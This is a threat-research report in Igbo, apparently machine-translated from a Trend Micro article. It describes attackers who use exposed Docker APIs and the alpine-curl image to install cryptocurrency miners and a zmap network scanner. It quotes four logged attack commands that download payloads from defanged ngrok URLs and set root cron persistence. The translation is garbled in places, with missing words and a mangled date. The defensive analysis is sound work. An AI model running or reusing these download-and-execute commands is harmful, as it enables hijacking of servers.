Anyị nyochara data anakọtara site na iji igbe mmanụ aṅụ, nke anyị mepụtara iji soro egwu egwu. Anyị chọpụtakwara nnukwu ọrụ sitere n'aka ndị na-egwuputa ego cryptocurrency na-achọghị ma ọ bụ n'enwetaghị ikike nke ebugara dị ka arịa rogue na-eji foto obodo ebipụtara na Docker Hub. A na-eji onyonyo a dị ka akụkụ nke ọrụ na-ebuga ndị na-egwupụta cryptocurrency ọjọọ.
Na mgbakwunye, a na-etinye mmemme maka iji netwọk rụọ ọrụ iji banye n'ime igbe na ngwa ndị agbata obi mepere emepe.
Anyị na-ahapụ ebe nchekwa mmanụ aṅụ anyị ka ọ dị, ya bụ, na ntọala ndabara, na-enweghị usoro nchekwa ọ bụla ma ọ bụ ntinye nke ngwanro ọzọ. Biko mara na Docker nwere ndụmọdụ maka ntọlite mbụ iji zere mperi na adịghị ike dị mfe. Ma honeypots eji bụ containers, e mere ịchọpụta ọgụ iji na containerization n'elu ikpo okwu, ọ bụghị ngwa n'ime containers.
Omume ọjọọ ahụ achọpụtara bụkwa ihe ama ama n'ihi na ọ chọghị adịghị ike yana ọ nọọrọ onwe ya na ụdị Docker. Ịchọta ihe ahaziri ezighi ezi, ya mere mepere ihe oyiyi akpa bụ ihe ndị na-awakpo chọrọ ibunye ọtụtụ sava mepere emepe.
Docker API emechiri emechi na-enye onye ọrụ ohere ịrụ ọtụtụ ụdị , gụnyere ịnweta ndepụta nke arịa na-agba ọsọ, ịnweta ndekọ site na otu akpa, ịmalite, nkwụsị (gụnyere mmanye) na ọbụna ịmepụta akpa ọhụrụ site na otu ihe oyiyi nwere ntọala akọwapụtara.
N'aka ekpe bụ usoro nnyefe malware. N'aka nri bụ gburugburu onye na-awakpo, nke na-enye ohere maka ịpụpụ ihe oyiyi.
Nkesa site na obodo 3762 mepere emepe Docker API. Dabere na ọchụchọ Shodan nke ụbọchị 12.02.2019/XNUMX/XNUMX
Agbụ ọgụ na nhọrọ ịkwụ ụgwọ
Achọpụtara omume ọjọọ ọ bụghị naanị site n'enyemaka nke ite mmanụ aṅụ. Data sitere na Shodan na-egosi na ọnụ ọgụgụ Docker API ekpughere (lee eserese nke abụọ) abawanyela kemgbe anyị nyochara akpa na-ezighi ezi ejiri dị ka àkwà mmiri na-ebuga Monero cryptocurrency Mining software. Na October afọ gara aga (2018, data dị ugbu a ihe ruru. onye ntụgharị okwu) enwere naanị 856 API mepere emepe.
Nnyocha nke ndekọ osisi mmanụ aṅụ na-egosi na ejiri ihe oyiyi akpa mee ihe jikọtara ya na iji , ngwá ọrụ iji guzobe njikọ echekwara ma ọ bụ na-ebuga okporo ụzọ site na ebe a na-enweta ọha na eze gaa na adreesị ma ọ bụ akụrụngwa akọwapụtara (dịka ọmụmaatụ localhost). Nke a na-enye ndị na-awakpo ohere ịmepụta URL nke ọma mgbe ha na-ebuga ụgwọ ọrụ na sava mepere emepe. N'okpuru bụ ọmụmaatụ koodu sitere na ndekọ na-egosi mmegbu nke ọrụ ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Dị ka ị na-ahụ, a na-ebudata faịlụ ndị ebudatara site na URL na-agbanwe mgbe niile. URL ndị a nwere obere ngwụcha ngwụcha, yabụ enweghị ike ibudata ụgwọ a na-akwụ mgbe ụbọchị ngwụcha gachara.
Enwere nhọrọ ịkwụ ụgwọ abụọ. Nke mbụ bụ ELF miner chịkọtara maka Linux (akọwapụtara dị ka Coinminer.SH.MALXMR.ATNO) nke jikọtara na ọdọ mmiri Ngwuputa. Nke abụọ bụ a script (TrojanSpy.SH.ZNETMAP.A) e mere iji nweta ụfọdụ netwọk ngwaọrụ eji iṅomi netwọk ranges wee chọọ ọhụrụ zaa.
Edemede dropper na-esetịpụ mgbanwe abụọ, nke a na-eji emezigharị onye na-egwupụta cryptocurrency. Ngbanwe HOST nwere URL ebe faịlụ ọjọọ dị, na mgbanwe RIP bụ aha faịlụ (n'ezie, hash) nke onye na-egwuputa ihe ga-ebuga. Ihe mgbanwe HOST na-agbanwe oge ọ bụla mgbanwe hash gbanwere. Edemede ahụ na-anwa ịlele na ọ nweghị ndị na-egwupụta cryptocurrency ọzọ na-agba ọsọ na sava ahụ wakporo.
Ọmụmaatụ nke mgbanwe HOST na RIP, yana koodu snippet eji elele na ọ nweghị ndị na-egwuputa ihe ọzọ na-agba ọsọ.
Tupu ịmalite onye na-egwuputa ihe, a na-akpọghachi ya nginx. Ụdị edemede ndị ọzọ nyegharịrị aha onye na-egwuputa ihe na ọrụ ndị ọzọ ziri ezi nwere ike ịdị na gburugburu Linux. Nke a na-ezukarị ịgafe nlele anya megide ndepụta nke usoro ịgba ọsọ.
Edemede ọchụchọ nwekwara atụmatụ. Ọ na-eji otu ọrụ URL arụ ọrụ iji bugharịa ngwaọrụ ndị dị mkpa. Otu n'ime ha bụ ọnụọgụ abụọ zmap, nke a na-eji nyochaa netwọk ma nweta ndepụta nke ọdụ ụgbọ mmiri mepere emepe. Edemede ahụ na-ebukwa ọnụọgụ abụọ ọzọ nke a na-eji na-emekọrịta ihe na ọrụ achọtara wee nata ọkọlọtọ n'aka ha iji chọpụta ozi ndị ọzọ gbasara ọrụ achọtara (dịka ọmụmaatụ, ụdị ya).
Edemede a na-ekpebikwa ụzọ ụfọdụ ọkwa netwọkụ ga-enyocha, mana nke a dabere na ụdị edemede ahụ. Ọ na-edobe ọdụ ụgbọ mmiri ebumnuche sitere na ọrụ-na nke a, Docker-tupu ịme nyocha ahụ.
Ozugbo enwere ike ịchọta ebumnuche, a na-ewepụ ọkọlọtọ na-akpaghị aka na ha. Edemede a na-enyochakwa ebumnuche dabere na ọrụ, ngwa, akụrụngwa ma ọ bụ nyiwe mmasị: Redis, Jenkins, Drupal, MODX, , Docker 1.16 ahịa na Apache CouchDB. Ọ bụrụ na ihe nkesa nyochara dabara nke ọ bụla n'ime ha, a na-echekwa ya na faịlụ ederede, nke ndị na-awakpo nwere ike iji mee nyocha na hacking na-esote. A na-ebugote faịlụ ederede ndị a na sava ndị mwakpo ahụ site na njikọ dị ike. Ya bụ, a na-eji URL dị iche iche maka faịlụ ọ bụla, nke pụtara na ịnweta na-esote siri ike.
Vector ọgụ bụ onyonyo Docker, dịka enwere ike ịhụ na koodu abụọ na-esote.
N'elu ka a na-atụgharị aha ka ọ bụrụ ọrụ ziri ezi, na ala bụ ka esi eji zmap nyochaa netwọk.
N'elu bụ ọkwa netwọkụ eburu ụzọ kọwaa, na ala bụ ọdụ ụgbọ mmiri akọwapụtara maka ịchọ ọrụ, gụnyere Docker.
Nseta ihuenyo na-egosi na ebudatara foto alpine-curl karịa ugboro nde iri
Dabere na Alpine Linux na curl, ngwá ọrụ CLI na-arụ ọrụ nke ọma maka ịnyefe faịlụ n'elu usoro dị iche iche, ị nwere ike wulite . Dị ka ị na-ahụ na foto gara aga, ebudatala ihe oyiyi a karịa ugboro nde iri. Ọnụ ọgụgụ buru ibu nke nbudata nwere ike ịpụta iji onyonyo a dị ka ebe ntinye; emelitere onyonyo a ihe karịrị ọnwa isii gara aga; ndị ọrụ anaghị ebudata onyonyo ndị ọzọ na ebe nchekwa a ugboro ugboro. Na Docker - usoro ntuziaka eji ahazi akpa iji na-agba ya. Ọ bụrụ na ntọala ebe ntinye ezighi ezi (dịka ọmụmaatụ, a na-ahapụ akpa ahụ na ịntanetị), enwere ike iji ihe onyonyo a dị ka vector ọgụ. Ndị na-awakpo ahụ nwere ike iji ya bute ibu a na-akwụ ụgwọ ma ọ bụrụ na ha ahụ akpa ahazighị nke ọma ma ọ bụ nke mepere emepe na-akwadoghị.
Ọ dị mkpa iburu n'obi na ihe oyiyi a (alpine-curl) n'onwe ya adịghị njọ, ma dịka ị na-ahụ n'elu, enwere ike iji ya rụọ ọrụ ọjọọ. Enwere ike iji onyonyo Docker yiri ya mee omume ọjọọ. Anyị kpọtụụrụ Docker ma soro ha rụkọọ ọrụ na nke a.
na-atụ aro
foduru maka ọtụtụ ụlọ ọrụ, karịsịa ndị na-emejuputa atumatu , lekwasịrị anya na mmepe ngwa ngwa na nnyefe. Ihe niile na-akawanye njọ site na mkpa ọ dị ịgbaso iwu nyocha na nlekota oru, mkpa iji nyochaa nzuzo data, yana nnukwu mmebi site na nrubeisi ha. Ịbanye akpaaka nchekwa n'ime usoro ndụ mmepe abụghị naanị na-enyere gị aka ịchọta oghere nchekwa nke nwere ike ịgaghị achọpụta, mana ọ na-enyekwara gị aka ibelata ibu ọrụ na-adịghị mkpa, dị ka ịgba ọsọ ngwanro ọzọ na-ewuli maka adịghị ike ma ọ bụ nhazi nke ọ bụla achọpụtara mgbe ebufere ngwa.
Ihe omume a tụlere n'isiokwu a na-eme ka ọ dị mkpa iburu nchekwa n'uche site na mmalite, gụnyere ndụmọdụ ndị a:
- Maka ndị nchịkwa sistemụ na ndị mmepe: lelee ntọala API gị mgbe niile ka ị hụ na ahaziri ihe niile ka ọ nabata arịrịọ sitere na otu sava ma ọ bụ netwọk dị n'ime.
- Soro ụkpụrụ nke ikike kacha nta: hụ na abanyela na onyonyo akpa, kpachie ohere ịnweta akụrụngwa dị oke mkpa (ọrụ mbido akpa) wee tinye nzuzo na njikọ netwọkụ.
- Soro ma mee ka usoro nchekwa dị, dịka. na arụnyere n'ime .
- Jiri nyocha akpaghị aka nke oge ọsọ yana onyonyo iji nweta ozi ndị ọzọ gbasara usoro na-agba n'ime akpa (dịka ọmụmaatụ, iji chọpụta nhụsianya ma ọ bụ chọọ adịghị ike). Njikwa ngwa na nleba anya nke ọma na-enyere aka soro mgbanwe na-adịghị mma na sava, faịlụ na mpaghara sistemụ.
Trendmicro na-enyere ndị otu DevOps aka iwulite ntụkwasị obi, tụgharịa ngwa ngwa, wee malite ebe ọ bụla. Trend Micro Na-enye nchekwa dị ike, gbagharịa, na akpaaka n'ofe pipeline DevOps nke otu ụlọ ọrụ ma na-enye ọtụtụ ihe nchebe iyi egwu. iji chebe ibu ọrụ anụ ahụ, mebere na igwe ojii n'oge ọ na-agba ọsọ. Ọ na-agbakwụnyekwa nchekwa akpa na и , nke na-enyocha ihe onyonyo akpa Docker maka malware na adịghị ike n'oge ọ bụla na pipeline mmepe iji gbochie ihe egwu tupu ebuga ha.
Ihe ịrịba ama nke nkwenye
Hashes emetụtara:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
Na Ndị ọkà okwu na-ekwu okwu na-egosi ihe ntọala kwesịrị ibu ụzọ mee ka o wee belata ohere ọ nwere ma ọ bụ zere ọnọdụ nke ọnọdụ a kọwara n'elu kpamkpam. Na August 19-21 na ntanetị siri ike Ị nwere ike ikwurịta ihe ndị a na nsogbu nchebe ndị yiri ya na ndị ọrụ ibe na ndị nkụzi na-eme ihe na tebụl gburugburu, ebe onye ọ bụla nwere ike ikwu okwu ma gee ntị na mgbu na ọganihu nke ndị ọrụ ibe nwere ahụmahụ.
isi: www.habr.com